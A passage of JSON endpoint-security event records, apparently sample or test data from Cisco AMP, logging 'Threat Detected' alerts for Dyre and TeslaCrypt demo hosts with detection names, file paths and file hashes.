Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":753000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":733000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":324000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258878267720000,"timestamp":1610705810,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:16:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258878267719767","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258826728112000,"timestamp":1610705798,"timestamp_nanoseconds":310000000,"date":"2021-01-15T10:16:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258826728112214","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251202912551000,"timestamp":1610705786,"timestamp_nanoseconds":262000000,"date":"2021-01-15T10:16:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251202912550913","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\Windows\\System32\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258706469028000,"timestamp":1610705770,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:16:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258706469027925","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258680699224000,"timestamp":1610705764,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:16:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258680699224148","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":428000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":39000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":9000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580189","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668361375580000,"timestamp":1610705755,"timestamp_nanoseconds":616000000,"date":"2021-01-15T10:15:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258629159617000,"timestamp":1610705752,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:15:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258629159616595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258577620009000,"timestamp":1610705740,"timestamp_nanoseconds":637000000,"date":"2021-01-15T10:15:40+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258577620009042","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258526080401000,"timestamp":1610705728,"timestamp_nanoseconds":609000000,"date":"2021-01-15T10:15:28+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258526080401489","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258474540794000,"timestamp":1610705716,"timestamp_nanoseconds":987000000,"date":"2021-01-15T10:15:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258474540793936","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258423001186000,"timestamp":1610705704,"timestamp_nanoseconds":959000000,"date":"2021-01-15T10:15:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258423001186383","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668099382575000,"timestamp":1610705694,"timestamp_nanoseconds":696000000,"date":"2021-01-15T10:14:54+00:00","event_type":"Threat 